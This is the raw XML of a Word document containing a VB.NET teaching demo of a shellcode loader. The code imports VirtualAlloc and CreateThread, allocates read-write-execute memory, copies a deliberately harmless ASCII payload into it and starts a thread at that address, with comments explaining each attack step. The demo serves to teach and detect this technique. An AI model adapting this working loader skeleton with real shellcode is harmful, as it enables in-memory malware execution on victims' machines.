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6CD5D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>Imports System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED12AB9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>Imports System.Runtime.InteropServices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960CF0E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>Imports System.Threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F40962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>Imports System.Text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A18980C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</w:p>
    <w:p w14:paraId="6C8DB49D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>Module ShellcodeLoaderConcept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1356DAF9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</w:p>
    <w:p w14:paraId="061B34E3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' =========================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8A54E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' 1. WINDOWS API DECLARATIONS (THE TOOLS OF THE ATTACK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187A8E0F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' =========================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A89E6E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</w:p>
    <w:p w14:paraId="4FD2B8A7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' A. VirtualAlloc: Allocates a memory region, specifying its permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6202BE93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'    Crucial for getting EXECUTE permissions needed by shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55FA6D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&lt;DllImport("kernel32.dll", SetLastError:=True)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6374E616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Private Function VirtualAlloc(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABC691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    lpAddress As IntPtr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED63B8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    dwSize As UInt32,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1768C7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    flAllocationType As UInt32,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B7973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    flProtect As UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0F24D8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) As IntPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760533CE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End Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A14EA9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</w:p>
    <w:p w14:paraId="075387BC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' B. CreateThread: Starts a new execution thread. In an attack, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8ADEB6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'    lpStartAddress points directly to the malicious shellcode's memory address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8EB46D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&lt;DllImport("kernel32.dll", SetLastError:=True)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC77EF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Private Function CreateThread(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688210D2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    lpThreadAttributes As IntPtr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CC3203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    dwStackSize As UInt32,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7823F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    lpStartAddress As IntPtr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C669A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    lpParameter As IntPtr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D39193C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    dwCreationFlags As UInt32,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289CCDE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    &lt;Out()&gt; ByRef lpThreadId As UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8531B8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) As IntPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD14E36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End Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB25CE3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</w:p>
    <w:p w14:paraId="14A24044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' =========================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F883557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' 2. CONSTANTS AND SAFE PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17730CC5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' =========================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BDA3F4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</w:p>
    <w:p w14:paraId="0D479EEF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' The R-W-X permission flag: The critical step for shellcode execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA901C1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Private Const PAGE_EXECUTE_READWRITE As UInt32 = &amp;H40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B5152A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Private Const MEM_COMMIT As UInt32 = &amp;H1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF9D41B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Private Const MEM_RESERVE As UInt32 = &amp;H2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B0692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</w:p>
    <w:p w14:paraId="2247E522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' --- SAFE, NON-EXECUTABLE PAYLOAD ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E17E1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' In a real attack, this array holds raw assembly instructions (shellcode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7256D400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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ' For safety, this array holds benign, non-executable ASCII text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080FE5DC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Private ReadOnly SafePayloadBytes() As Byte = Encoding.ASCII.GetBytes("This is safe data, not executable shellcode.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F1E4F0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</w:p>
    <w:p w14:paraId="2EE8B7FC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' =========================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E70E7F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' 3. EXECUTION FLOW (THE LOADER STEPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B23F0B6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' =========================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6300A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</w:p>
    <w:p w14:paraId="5FFDB2C4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Sub Main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BFFFD1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    Console.Title = "Shellcode Loader Mechanism (Safe Demo)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC5BD02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    Console.ForegroundColor = ConsoleColor.Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0C586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    Console.WriteLine("--------------------------------------------------")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D690AE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    Console.WriteLine("ATTACK FLOW DEMO: Memory Injection Mechanism")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13792560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    Console.WriteLine("--------------------------------------------------")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B9643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    Console.ResetColor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E05FA1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</w:p>
    <w:p w14:paraId="4AC194C8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    Dim PayloadSize As UInt32 = CUInt(SafePayloadBytes.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7588B4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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A6F9A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    ' ---------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A685DB5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    ' STEP 1: ALLOCATE EXECUTABLE MEMORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DFBEC5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    ' ---------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A6797D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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F75CB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    Console.ForegroundColor = ConsoleColor.Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6CE3B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    Console.WriteLine(Environment.NewLine &amp; "-&gt; 1. VirtualAlloc: Requesting R-W-X Memory")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B426CF9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    Console.ResetColor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B677E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</w:p>
    <w:p w14:paraId="139E4137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    ' Call VirtualAlloc to reserve and commit a memory region with EXECUTE permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393898CC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    Dim AllocatedMemoryPtr As IntPtr = VirtualAlloc(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4A9E54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        IntPtr.Zero,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A8DCA7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        PayloadSize,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125A7DE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        MEM_COMMIT Or MEM_RESERVE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA5C824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        PAGE_EXECUTE_READWRITE ' &lt;-- This is the attack's primary signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFBD468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    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1096FC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</w:p>
    <w:p w14:paraId="6D7D2F77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    If AllocatedMemoryPtr.ToInt64() = 0 Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7692D3F9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        Console.ForegroundColor = ConsoleColor.DarkRed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DAFF4C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        Console.WriteLine("[ERROR] VirtualAlloc Failed. Cannot proceed.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618112F3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        Console.ResetColor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0D65C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        Return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC5859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    End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D060866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</w:p>
    <w:p w14:paraId="1B7D287E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    Console.WriteLine($"[INFO] Allocated R-W-X Memory at Address: 0x{AllocatedMemoryPtr.ToInt64():X}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8731C8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</w:p>
    <w:p w14:paraId="7C8D8E7C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        ' ---------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA01A2A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    ' STEP 2: COPY THE PAYLOAD INTO MEMORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6218A57B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    ' ---------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669152EC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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70270F82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    Console.ForegroundColor = ConsoleColor.Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258ADE06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    Console.WriteLine(Environment.NewLine &amp; "-&gt; 2. Marshal.Copy: Writing Payload Bytes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B743FF4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    Console.ResetColor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C66130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</w:p>
    <w:p w14:paraId="768B3757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    ' Copy the payload (our safe ASCII data) into the allocated executable memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6FAB1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    ' This step is where the shellcode bytes are silently written to R-W-X memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335C3C55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    Marshal.Copy(SafePayloadBytes, 0, AllocatedMemoryPtr, SafePayloadBytes.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74834F29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    Console.WriteLine($"[INFO] {SafePayloadBytes.Length} bytes of safe data written to memory.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80C044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</w:p>
    <w:p w14:paraId="225CF1F5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    ' Optional: Display the written data (for debugging observation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BB0437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    Console.WriteLine($"[DEBUG] Data in memory: {Encoding.ASCII.GetString(SafePayloadBytes)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9DA55F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</w:p>
    <w:p w14:paraId="29DDFCDD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    ' ---------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A6B79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    ' STEP 3: EXECUTE THE CODE (THREAD CREATION)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1039DBD9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    ' ---------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3D3F9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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD7BD85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    Console.ForegroundColor = ConsoleColor.Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8E446C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    Console.WriteLine(Environment.NewLine &amp; "-&gt; 3. CreateThread: Starting Execution")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3CA69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    Console.ResetColor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D8FCA1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</w:p>
    <w:p w14:paraId="3A608834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    Dim ThreadId As UInt32 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455F2F5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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10566019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    ' CreateThread starts a new thread, pointing its execution directly to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB1504F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    ' the start of the allocated memory (where the shellcode resides).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1962CD81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    Dim ThreadHandle As IntPtr = CreateThread(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E72896E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        IntPtr.Zero,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0F2A50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        0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD7015F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        AllocatedMemoryPtr, ' &lt;-- STARTING EXECUTION AT THE INJECTED CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C9032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        IntPtr.Zero,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814C394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        0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9FD072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        ThreadId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010C6A6D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    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B963D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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F764E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    If ThreadHandle &lt;&gt; IntPtr.Zero Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A72F6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        Console.WriteLine($"[INFO] CreateThread SUCCESS. New Thread ID: {ThreadId}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72694565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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B982176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        Console.ForegroundColor = ConsoleColor.Green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264889C1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        Console.WriteLine(Environment.NewLine &amp; "EXECUTION FLOW COMPLETE (Safe Data Executed)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D97B71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        Console.WriteLine("The three core steps of a shellcode loader have been demonstrated.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D617F14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        Console.ResetColor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20552B16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</w:p>
    <w:p w14:paraId="7E62B864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        ' In a real attack, the CPU would attempt to execute the safe data as assembly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C48C685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        ' This typically results in an immediate crash (e.g., Access Violation or Illegal Instruction),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4AF42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        ' which is why real shellcode must be meticulously crafted assembly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF47A1B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        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD0C57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        ' Wait briefly for the thread to attempt execution before exiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF37BA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        Thread.Sleep(500) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7299B767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    Else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1DECA6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        Console.ForegroundColor = ConsoleColor.DarkRed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C43F1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        Console.WriteLine("[ERROR] CreateThread Failed. Execution Blocked.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9751C3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        Console.ResetColor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A287E2F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    End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D8A77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</w:p>
    <w:p w14:paraId="6135FCAD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    Console.WriteLine(Environment.NewLine &amp; "Press ENTER to exit...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B6604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    Console.ReadLine()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF59A3E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 xml:space="preserve">    End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B20DA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</w:p>
    <w:p w14:paraId="14982D6E" w14:textId="77777777" w:rsidR="00AE4D1E" w:rsidRPr="0007624A" w:rsidRDefault="00AE4D1E" w:rsidP="0007624A">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007624A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>End Module</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00000000" w:rsidRPr="0007624A" w:rsidSect="0007624A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nsolas">
    <w:altName w:val="Arial Narrow"/>
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Courier New">
    <w:altName w:val="Calibri"/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24A"/>
    <w:rsid w:val="00004DD9"/>
    <w:rsid w:val="0007624A"/>
    <w:rsid w:val="00AE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7B0F6C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61972181-01EF-4647-B024-82E3473C0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7624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7624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1017</Words>
  <Characters>5802</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>48</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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Jeff Bardin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-27T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-27T12:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>